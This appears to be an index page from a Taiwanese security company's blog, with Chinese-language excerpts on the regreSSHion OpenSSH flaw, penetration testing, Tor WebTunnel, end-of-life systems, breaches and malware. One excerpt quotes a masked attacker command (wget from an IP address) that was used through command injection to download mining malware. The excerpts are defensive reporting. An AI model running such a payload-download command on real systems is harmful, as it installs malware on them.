-
Continue reading →: CVE-2024-6387
CVSS v3 Base Score: 8.1 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Severity: High —————————————————————————— CVE-2024-6387 是 OpenSSH 伺服器組件 (sshd) 中的一個嚴重漏洞,被稱為 regreSSHion。 這個漏洞被命名為「regreSSHion」,是因為它本質上是一個影響 OpenSSH 的回歸錯誤。 此漏洞是由信號處理器競爭條件(race condtion)引起的,可能導致未經身份驗證的遠端代碼執行(RCE),並授予攻擊者 root 權限。 估計全球有多達 1400 萬台主機受此漏洞影響。 為了解決這個問題,應更新 OpenSSH 到修復後的版本。可以從 OpenSSH 官方公告或相關安全公告中獲取具體的更新和修復信息。目前,OpenSSH團隊已釋出了OpenSSH 9.8/9.8p1,藉此修正本漏洞。 網路上已有相關PoC,為防止嚴重問題,建議儘快更新系統! 相關第三方程式亦可簡易掃描,看自己的系統是否有此漏洞: https://github.com/xaitax/CVE-2024-6387_Check/blob/main/CVE-2024-6387_Check.py
-
Continue reading →: 內網滲透測試的必要性
駭客常常已潛藏在內部網路(例如:已利用社交工程進入內網、已誘使用戶使用惡意元件、vpn破解等),因此以這樣的狀況為前提之內網透測試,即有其必要性。以下是一些原因和好處: 內網滲透測試是一種預防性措施,能夠幫助企業主動識別和解決安全問題,從而保護其內部資產和數據的安全。更多資訊請點這樣:內網滲透測試。
-
Continue reading →: 生成式AI(Generative AI Risks)的資安風險
生成式AI(Generative AI)是一種利用機器學習技術來生成新的內容的人工智能技術。這些內容包括文字、圖像、聲音、影片等等。生成式AI模型,例如生成對抗網絡(GANs)和變分自編碼器(VAEs),通過學習大量的訓練數據來創建與訓練數據相似但全新的內容。這樣的技術,對資安卻帶來新的風險。 生成式AI的資安風險 新的AI科技帶來了便利性,但相對的,它也帶來了新的資安威脅。如何正確防禦此類新型態的攻擊,將是大家必須嚴正關注的要事!
-
Continue reading →: WebTunnel BridgeTor發布
Tor發布了WebTunnel,這是一種新型的Tor橋接,旨在幫助位於網路審查區域的使用者連接到Tor網路(WebTunnel是一種抗審查的傳輸工具)。它可以模仿加密的網路流量(HTTPS),受到HTTPT(https://www.usenix.org/conference/foci20/presentation/frolov)的啟發而設計。它通過將有效負載連接包裝成類似於WebSocket的HTTPS連接來運作,對網路觀察者呈現為普通的HTTPS(WebSocket)連接。因此,對於沒有隱藏路徑知識的旁觀者來說,它看起來就像是與網頁伺服器的常規HTTP連接,給人一種用戶只是在瀏覽網路的印象。 事實上,WebTunnel與普通的網路流量非常相似,因此當有人嘗試訪問共享網路地址上的網站時,他們將只能感知到該網站地址的內容,並不會注意到秘密橋梁(WebTunnel)的存在。 因相關技術亦可能遭受駭客利用,將敏感資訊從組織內部外傳,因此預期Tor WebTunnel對企業的資安來說,將會是一項新的挑戰。 相關內容請參考: https://community.torproject.org/relay/setup/webtunnel/
-
Continue reading →: 為何需要使用安全的隨機函式(Secure Random Function)?
使用安全的隨機函式(secure random)可產生安全的隨機數字(infeasible to predict),對於確保各種應用程式中的敏感資訊的完整性(integrity)、機密性(confidentiality)至關重要。以下是一些重要性的原因: 總結來說,使用安全的隨機函式對於維護依賴於隨機性的系統和應用程式的安全性、隱私性和完整性至關重要,這些系統和應用程式用於加密操作、抵抗攻擊、會話管理、遵守法規和保護用戶隱私。
-
Continue reading →: 為何使用已經停止維護(EOL)的系統,會被認為是重大漏洞?
我們在為客戶進行資安檢測時,常被問到的問題之一,即是「為何使用已經停止維護(EOL)的系統,會被認為是重大漏洞?」 許多公司仍使用Windows XP、CentOS 8,以及其他已停止支援的系統或應用程式。而光盾在檢測時,往往會依照最新版的CVSS評分,將此類問題列入漏洞。 我們常檢測出未有被發布CVE的系統,包含了「主機控制漏洞」,讓駭客可以任意遠端操作主機。但在通報廠商後,廠商表示系統已停止維護,不會進行任何修正。這表示多數停止維護的系統,很可能包含諸多潛藏的零時差漏洞,不會有相關CVE資訊,且永遠不會獲得修正、難以控管。 使用已經停止維護的系統會被認為是重大漏洞的原因主要有以下幾點: 因此,為了確保系統的安全性和穩定性,建議大家使用並維護最新版本的軟體和作業系統,以及及時應用安全更新和修補程式。
-
Continue reading →: 俄羅斯駭客駭入微軟主管的電子郵件信箱
根據新聞報導,一個俄羅斯的駭客組織,名為午夜暴風雪(Midnight Blizzard),又被稱為諾貝爾姆(Nobelium),駭入微軟主管、法律部門的電子信箱中。 這是駭客主要的入侵途徑: 從2023年11月底開始,駭客使用密碼噴灑攻擊(password spray)來入侵一個測試帳號中,建立據點,然後使用該帳戶的權限來入侵微軟的其他企業郵件帳戶,包含主管、法律部門等。駭客亦洩露了一些郵件和附件內容。 由此可見,系統的強度僅等同於最弱的環節。測試用的系統、服務、帳號均應使用「最小權限原則」(Principle of least privilege),防止攻擊者加以利用(最小權限原則是要求計算環境中的每個模組如用戶或電腦程式只能存取當下所必需的訊息或者資源)。 相關連結: https://www.csoonline.com/article/1296269/russia-based-group-hacked-emails-of-microsofts-senior-leadership.html
-
Continue reading →: 駭客利用系統漏洞植入新型惡意程式
光盾研究員不斷發現駭客利用系統漏洞,嘗試於各式系統中植入新型惡意程式。近期一個案例,是攻擊者利用上傳功能,在系統中植入Unix.Virus.Ladvix。此病毒會在Unix系統中挖礦,且駭客可遠端控制受駭的電腦、置入更多惡意檔案。 在另一個例子中,駭客利用了主機控制漏洞(OS Commanding),使用以下指令,控制主機下載病毒(原始IP位址已被遮蔽): wget http://x.x.x.x/df2vGJJ58ivF 由VirusTotal進行偵測,可發現僅一支防毒軟體能正確偵測此支病毒: 防止此類問題需要利用深層防禦(Defense in Depth)的概念。深度防禦(DiD)是一種資訊安全的方法,其中一系列的防禦機制被層層堆疊,以保護有價值的數據和資訊。如果一個機制失效,另一個立即介入以阻止攻擊。這種多層次的方法可提高系統整體的安全性,並應對許多不同的攻擊維度。舉例來說,除了應用程式防火牆、IPS/IDS、防毒之外,主機亦應布署監控機制,偵測並阻擋未知的「內往外」連線。 此外,為防止系統包含重大漏洞,定期的滲透測試、弱點掃描均為必須。這些方式能在駭客破解漏洞之前,先了解問題並修補系統。
-
Continue reading →: 駭客入侵半導體大廠京鼎網站
鴻海集團旗下半導體設備大廠京鼎(3413)遭駭客入侵。根據駭客留在官網的資訊,表示如果京鼎不支付費用,客戶資料將被公開。下面是官網遭駭的原始截圖: 相關新聞網址: https://infosecu.technews.tw/2024/01/16/foxsemicon-been-hacked/
-
Continue reading →: 源碼檢測、弱點掃描和滲透測試有什麼不同?
源碼檢測、弱點掃描和滲透測試是與系統安全相關的不同檢測方式,因此適用性、可檢測的內容、需要時程等等都不一樣。以下是它們的主要區別: 總體而言,源碼檢測主要關注源碼層面的問題,弱點掃描側重於已知漏洞的識別,而滲透測試則模擬實際攻擊,通過多個角度評估系統的安全性。這三者通常作為綜合的安全測試策略的一部份,以提高整體安全性。
光盾資訊
分享資安相關文章、新聞的地方
與我們聯絡
Check out latest information security news!
Stay updated with our latest news